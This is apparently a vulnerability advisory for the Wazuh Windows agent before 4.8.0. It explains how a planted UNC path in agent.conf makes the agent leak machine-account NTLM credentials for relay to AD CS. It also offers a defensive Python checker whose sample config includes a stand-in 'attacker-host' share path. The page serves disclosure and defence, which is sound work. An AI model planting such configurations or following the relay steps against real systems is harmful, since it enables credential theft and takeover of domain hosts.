Wazuh Agent for Windows Improper Input Validation Vulnerability Leading to Remote Code Execution and Privilege Escalation

Vulnerability

A vulnerability in the Wazuh agent for Windows, affecting versions prior to 4.8.0, allows an attacker who controls the Wazuh server, or who holds an agent's key (the shared key the agent uses to authenticate and encrypt its traffic to the manager), to push a modified configuration to the agent. That configuration can point the agent at a UNC path on an SMB server the attacker controls. Because the agent service runs as NT AUTHORITY\SYSTEM, the outbound SMB connection authenticates with the computer's domain machine account, and the attacker captures its Net-NTLMv2 response. Machine-account passwords are long and random, so the captured response is not practically crackable, but it can be relayed: for example to an Active Directory Certificate Services web enrollment endpoint to obtain a certificate issued to the machine account, which then lets the attacker authenticate as that computer, execute code on it and escalate to SYSTEM, or used in similar NTLM relay attacks.

Impact

Exploitation of this vulnerability leads to remote code execution on the affected system, with the attacker's code running under the highly privileged 'NT AUTHORITY\System' account. It also enables local privilege escalation: relaying the intercepted Net-NTLMv2 authentication of the machine account yields credentials (such as a certificate issued to that account) that authenticate as the computer itself, from which an attacker can impersonate 'NT AUTHORITY\System' on it.

Reproduction

To reproduce this vulnerability, place a Wazuh agent in a group whose shared 'agent.conf' contains a 'localfile' directive whose 'location' is a UNC path on an SMB server the attacker controls. When the agent applies the configuration and opens that path, it authenticates to the attacker's server as the machine account; capture the Net-NTLMv2 response there. Relay the captured authentication to Active Directory Certificate Services to obtain a certificate for the machine account, then use that certificate to authenticate as the computer and execute code on the affected host.
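The following script is an added example written for this page; it is not code from the advisory or from the Wazuh project. It embeds a constructed 'agent.conf' fragment of the shape described above (the 'attacker-host' name and share are placeholders, not values from the advisory), extracts every 'localfile' location from it, flags the ones that are UNC paths the SYSTEM-level agent would open over SMB, and compares an agent version string against the fixed release. It assumes Wazuh's configuration layout (repeated top-level 'agent_config' or 'ossec_config' blocks with 'localfile'/'location' children). On an agent the files to feed it are, by default, 'ossec.conf' and 'shared\agent.conf' under the agent install directory; on the manager the same functions can be pointed at the group files under the 'shared' directory, which is where an attacker with server control would plant the directive.

```python
"""Added example: check a Wazuh Windows agent for the UNC-path localfile issue.

Check 1: is the agent version older than 4.8.0, the release with the fix?
Check 2: does the configuration the agent applies contain a 'localfile' whose
'location' is a UNC path, i.e. one the SYSTEM-level agent service would open
over SMB and thereby authenticate to as the machine account?
"""
import re
import sys
import xml.etree.ElementTree as ET

FIXED_VERSION = (4, 8, 0)

# Constructed sample in the shape the advisory describes. 'attacker-host' and the
# share are placeholders. First entry is a normal local log; the other two are
# network paths, one in each separator style Windows accepts.
SAMPLE_AGENT_CONF = """\
<agent_config os="Windows">
  <localfile>
    <location>C:\\logs\\app.log</location>
    <log_format>syslog</log_format>
  </localfile>
  <localfile>
    <location>\\\\attacker-host\\share\\agent.log</location>
    <log_format>syslog</log_format>
  </localfile>
</agent_config>
<agent_config>
  <localfile>
    <location>//attacker-host/share/other.log</location>
    <log_format>syslog</log_format>
  </localfile>
</agent_config>
"""


def parse_localfile_locations(config_text: str) -> list[str]:
    """Every <localfile><location> value in a Wazuh config file, in order."""
    # Wazuh config files may hold several top-level blocks, so the file is not
    # a single-rooted XML document: drop any XML declaration and wrap it first.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", config_text)
    root = ET.fromstring("<wrapper>" + body + "</wrapper>")
    found = []
    for localfile in root.iter("localfile"):
        text = localfile.findtext("location")
        if text and text.strip():
            found.append(text.strip())
    return found


def is_unc_path(location: str) -> bool:
    """True if Windows would resolve the path over the network (either separator
    style). The device-namespace prefixes \\\\?\\ and \\\\.\\ stay local unless
    followed by UNC\\."""
    p = location.strip()
    if p.startswith("\\\\?\\") or p.startswith("\\\\.\\"):
        return p[4:].upper().startswith("UNC\\")
    return p.startswith("\\\\") or p.startswith("//")


def find_unc_localfiles(config_text: str) -> list[str]:
    """The localfile locations the agent would open over SMB."""
    return [loc for loc in parse_localfile_locations(config_text) if is_unc_path(loc)]


def parse_version(version_string: str) -> tuple[int, int, int]:
    """Extract x.y.z from strings such as '4.7.5' or 'Wazuh v4.7.5'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_string)
    if not m:
        raise ValueError(f"no x.y.z version in {version_string!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def agent_is_vulnerable(version_string: str) -> bool:
    """True for any release before 4.8.0 (tuple compare, so 4.10.x is not)."""
    return parse_version(version_string) < FIXED_VERSION


def assess(version_string: str, config_text: str) -> dict:
    """Both checks in one report."""
    return {
        "version": ".".join(str(n) for n in parse_version(version_string)),
        "vulnerable_version": agent_is_vulnerable(version_string),
        "unc_localfiles": find_unc_localfiles(config_text),
    }


if __name__ == "__main__":
    # Usage: python check_wazuh_unc.py "<agent version>" [ossec.conf] [agent.conf]
    # Without config files the constructed sample above is analysed.
    version = sys.argv[1] if len(sys.argv) > 1 else "Wazuh v4.7.5"
    text = "\n".join(open(p, encoding="utf-8").read() for p in sys.argv[2:]) or SAMPLE_AGENT_CONF
    report = assess(version, text)
    state = "VULNERABLE (pre-4.8.0)" if report["vulnerable_version"] else "fixed"
    print(f"agent version {report['version']}: {state}")
    for loc in report["unc_localfiles"] or ["(none)"]:
        print("  UNC localfile location:", loc)
```

A UNC entry in a group's 'agent.conf' is not by itself proof of compromise (some deployments do collect logs from shares), but on a pre-4.8.0 agent every such entry is an authentication of the machine account to whatever host the path names, so each one should be traced back to a known change.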

Remediation

Users are advised to update the Wazuh agent for Windows to version 4.8.0 or later. Because the attack requires control of the manager or an agent's key, also treat the manager's shared group configurations (the 'agent.conf' files under the 'shared' directory) as sensitive: restrict who can write them and audit them for 'localfile' locations that reference UNC paths. Standard NTLM relay mitigations (SMB signing, Extended Protection for Authentication on AD CS web enrollment, and blocking outbound SMB from hosts that have no business reaching untrusted servers) limit what an attacker can do with a captured response even on an agent that has not yet been updated.

Added: Jun 11, 2025, 5:13 AM
Updated: Jun 11, 2025, 9:35 AM

Vulnerability Rating

Custom Algorithm

spread          0.0
impact         10.0
exploitability  7.6
remediation     7.7
relevance       0.2
threat          6.4
urgency         2.9
incentive       1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.